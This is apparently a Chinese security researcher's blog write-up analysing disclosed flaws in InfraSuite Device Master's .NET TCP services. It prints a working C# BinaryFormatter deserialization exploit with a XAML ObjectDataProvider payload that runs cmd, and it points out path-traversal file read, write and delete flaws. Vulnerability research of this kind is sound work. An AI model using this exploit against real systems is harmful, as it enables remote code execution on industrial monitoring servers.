警告
本文最后更新于 2022-11-08,文中内容可能已过时。
看到zdi发了一堆洞,有反序列化、目录穿越、权限绕过等等,还是dotnet的,于是有了此文。
ZDI爆的洞如图
![image.png](https://qiita-image-store.s3.ap-northeast-1.amazonaws.com/0/593424/7e6763e3-fce8-9410-8ba0-eba3d72579aa.png)
exe对应端口
1
2
3
| C:\Program Files\InfraSuite Device Master\Device-DataCollect\Device-DataCollect.exe 3000
C:\Program Files\InfraSuite Device Master\Device-Gateway\Device-Gateway.exe 3100 3110
C:\Program Files\InfraSuite Device Master\Device-Gateway\Device-Gateway.exe 80 443
|
https://www.zerodayinitiative.com/advisories/ZDI-22-1478/
这个漏洞在3100和3110端口
从TCP服务器到业务处理的逻辑如下
![image.png](https://qiita-image-store.s3.ap-northeast-1.amazonaws.com/0/593424/7e7b643c-e258-dcb1-b0e5-66ca337612e5.png)
StartGatewayOperation中设置了网关服务的一些配置
![image.png](https://qiita-image-store.s3.ap-northeast-1.amazonaws.com/0/593424/1dbec158-8eee-e877-ef55-c0c0ab0953ff.png)
初始化TCP端口
![image.png](https://qiita-image-store.s3.ap-northeast-1.amazonaws.com/0/593424/a5a305b5-cb64-9043-3c5c-f221477907a5.png)
监听IPv4 v6,端口DEFAULT_TCP_PORT
![image.png](https://qiita-image-store.s3.ap-northeast-1.amazonaws.com/0/593424/f9ec626c-945e-b7e2-b5f2-6e8f0e65d179.png)
this.InitialWebEngine()中配置了web服务器
![image.png](https://qiita-image-store.s3.ap-northeast-1.amazonaws.com/0/593424/069ec782-d232-7a07-2401-a51fefabc1d3.png)
在StartControlLayer中起worker线程跑业务逻辑
![image.png](https://qiita-image-store.s3.ap-northeast-1.amazonaws.com/0/593424/be097f5a-1cfd-d10e-c0b3-bce33de67bbf.png)
也就是MainLoop
![image.png](https://qiita-image-store.s3.ap-northeast-1.amazonaws.com/0/593424/be8bc5ee-2301-63a5-c67e-d852ab097cd7.png)
在DoUpperLayerNWPacket中根据PacketData的sHeader字段的i32PayloadType进行switch case。
![image.png](https://qiita-image-store.s3.ap-northeast-1.amazonaws.com/0/593424/6ae69209-d8fa-4cf3-fec6-6aa605d62cc4.png)
随便进入一个case
![image.png](https://qiita-image-store.s3.ap-northeast-1.amazonaws.com/0/593424/4d6bd007-1bdc-811c-93c5-77811af81616.png)
看到 Serialization.DeSerializeBinary(sPacket.payload, out obj)
![image.png](https://qiita-image-store.s3.ap-northeast-1.amazonaws.com/0/593424/a4ba7f22-c20c-117d-5fee-6f21e37a5d56.png)
直接binaryformatter,没啥好说的。关键点在于怎么构造payload。
构造需要研究其tcp的处理逻辑,在ControlLayerMngt的构造函数中
![image.png](https://qiita-image-store.s3.ap-northeast-1.amazonaws.com/0/593424/ef5df9ee-ceaa-4559-94e2-62d42340a603.png)
初始化了一个TCPServerConnectionMngt,在ModuleInitialization中定义了TCP链接的send和receive事件。
![image.png](https://qiita-image-store.s3.ap-northeast-1.amazonaws.com/0/593424/fa38d405-f177-0438-310a-ebf3d960ad7f.png)
我们发送给server的请求是receive事件,被ReceiveCallBack处理。
![image.png](https://qiita-image-store.s3.ap-northeast-1.amazonaws.com/0/593424/5e323f66-c722-453a-3467-a342680c9cec.png)
分别进行add、check操作
在add中将传入的buffer赋予自身this._gRxPacketBytesBuffer,变长存储字节数据。
![image.png](https://qiita-image-store.s3.ap-northeast-1.amazonaws.com/0/593424/ee22d7ae-c838-ef66-b366-aea4d083abbf.png)
check中检查数据包格式,重组PacketData对象
![image.png](https://qiita-image-store.s3.ap-northeast-1.amazonaws.com/0/593424/8a2d186e-5178-aaa6-1b21-1ce5428b92f5.png)
并调用this.AddRxPacket(packetData)将重组的packet对象加入this._gRxPacketList
![image.png](https://qiita-image-store.s3.ap-northeast-1.amazonaws.com/0/593424/40c25c42-a6c7-da0e-0af4-6c9baa5a1103.png)
回看MainLoop
![image.png](https://qiita-image-store.s3.ap-northeast-1.amazonaws.com/0/593424/3d886b3f-9993-3dca-ce6d-5c3afc151982.png)
this.CheckUpperLayerNWPacket();
this.DoUpperLayerNWPacket();
Check调用ReceivePacket判断this._gRxPacketList中是否有数据包
![image.png](https://qiita-image-store.s3.ap-northeast-1.amazonaws.com/0/593424/58772bea-fcbf-d58d-d088-8b6f0af2f7c0.png)
ReceivePacket调用GetFirstRxPacket拿到第一个数据包packet
![image.png](https://qiita-image-store.s3.ap-northeast-1.amazonaws.com/0/593424/a5237c99-3f69-f0af-0ef3-0a3b42355544.png)
然后调用this._gUpperLayerNWPacketQueue.AddToSyncQueue(packetData)将数据包加入到同步队列中。
DoUpperLayerNWPacket就是拿到队列中的第一个数据包
![image.png](https://qiita-image-store.s3.ap-northeast-1.amazonaws.com/0/593424/dbae1a97-b2ed-2a64-7c54-60a4d8b0ba7a.png)
到这里的话就随便进入一个case,拿CtrlLayerNWCmd_FileOperation举例
![image.png](https://qiita-image-store.s3.ap-northeast-1.amazonaws.com/0/593424/6526d1b2-1eb0-ab1d-8602-53fa71c26b42.png)
将PacketData的payload字段反序列化回来,转为CtrlLayerNWCommand_FileOperation业务对象从而进行下一步业务处理。
那么到此,我们基本明白了其架构。
![image.png](https://qiita-image-store.s3.ap-northeast-1.amazonaws.com/0/593424/df3341dd-9363-8bb3-bacc-03691714f0ce.png)
那么写EXP完全照搬就行了。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
| using InfraSuiteManager.Common;
using System;
using System.IO;
using System.Runtime.Serialization;
using Microsoft.VisualStudio.Text.Formatting;
using System.Net.Sockets;
namespace ConsoleApp1
{
internal class Program
{
[Serializable]
public class TextFormattingRunPropertiesMarshal : ISerializable
{
protected TextFormattingRunPropertiesMarshal(SerializationInfo info, StreamingContext context)
{
}
string _xaml;
public void GetObjectData(SerializationInfo info, StreamingContext context)
{
Type typeTFRP = typeof(TextFormattingRunProperties);
info.SetType(typeTFRP);
info.AddValue("ForegroundBrush", _xaml);
}
public TextFormattingRunPropertiesMarshal(string xaml)
{
_xaml = xaml;
}
}
static void Main(string[] args)
{
string xaml_payload = File.ReadAllText(@"1.txt");
TextFormattingRunPropertiesMarshal payload = new TextFormattingRunPropertiesMarshal(xaml_payload);
PacketData packet = new PacketData();
PacketOperation packetOperation = new PacketOperation();
if (!Serialization.SerializeBinary(payload, out packet.payload))
{
Console.WriteLine("serialize error.");
}
packet.sHeader.i32PayloadSize = packet.payload.Length;
byte[] byTxPacket;
packetOperation.MakePacketBytes(packet, out byTxPacket);
TcpClient tcpClient = new TcpClient("172.16.9.136", 3000);
NetworkStream stream = tcpClient.GetStream();
var b = new BinaryWriter(stream);
b.Write(byTxPacket);
stream.Close();
tcpClient.Close();
Console.WriteLine("done.");
Console.ReadKey();
}
}
}
|
1
2
3
4
5
6
7
8
9
10
| <?xml version="1.0" encoding="utf-16"?>
<ObjectDataProvider MethodName="Start" IsInitialLoadEnabled="False" xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation" xmlns:sd="clr-namespace:System.Diagnostics;assembly=System" xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml">
<ObjectDataProvider.ObjectInstance>
<sd:Process>
<sd:Process.StartInfo>
<sd:ProcessStartInfo Arguments="/c notepad" StandardErrorEncoding="{x:Null}" StandardOutputEncoding="{x:Null}" UserName="" Password="{x:Null}" Domain="" LoadUserProfile="False" FileName="cmd" />
</sd:Process.StartInfo>
</sd:Process>
</ObjectDataProvider.ObjectInstance>
</ObjectDataProvider>
|
![image.png](https://qiita-image-store.s3.ap-northeast-1.amazonaws.com/0/593424/186e6f69-48d6-c769-42ad-4a21ab696f18.png)
对于Device-DataCollect 根据packetData.sHeader.i32PayloadType
可以case到1
![image.png](https://qiita-image-store.s3.ap-northeast-1.amazonaws.com/0/593424/e90344ae-6da4-5d56-edd8-0a273e755cb7.png)
InfraSuiteManager.DataCollectionLayer.DataCollectionLayerMngt.DCLNWCmd_DCServerStatus(ref PacketData)
这个地方有反序列化
![image.png](https://qiita-image-store.s3.ap-northeast-1.amazonaws.com/0/593424/9173b0f1-5729-15e2-8fb1-8218ecd2a4f2.png)
构造payload不写了,Device-DataCollect和Device-Gateway架构差不多。同样用PacketOperation构造packet数据包就行了。
其他的洞就是case不一样,以下就只写漏洞点所在了。
InfraSuiteManager.ControlLayer.ControlLayerMngt.CtrlLayerNWCmd_FileOperation(ref PacketData)
![image.png](https://qiita-image-store.s3.ap-northeast-1.amazonaws.com/0/593424/30c2ab17-6b21-0f58-4bd5-e02993732758.png)
fileName参数可控导致跨目录任意文件写入+任意文件删除
![image.png](https://qiita-image-store.s3.ap-northeast-1.amazonaws.com/0/593424/0cc9a77a-51d0-d366-8c10-b8d3f2e9b730.png)
fileName参数导致任意文件读取
没看出来,感觉是解压目录穿越
![image.png](https://qiita-image-store.s3.ap-northeast-1.amazonaws.com/0/593424/db3c97ec-c3b2-a0ac-6d6a-8616bb1c2979.png)
![image.png](https://qiita-image-store.s3.ap-northeast-1.amazonaws.com/0/593424/5efbfe5a-0f2f-5b59-ed46-981c78db899b.png)
![image.png](https://qiita-image-store.s3.ap-northeast-1.amazonaws.com/0/593424/66c166c1-ec57-f615-07d4-b2181e35aecc.png)
很经典的dotnet tcp server的漏洞,尤其是server对于tcp packet的处理和业务逻辑的关联梳理,让我对dotnet的理解更进一步。
文笔垃圾,措辞轻浮,内容浅显,操作生疏。不足之处欢迎大师傅们指点和纠正,感激不尽。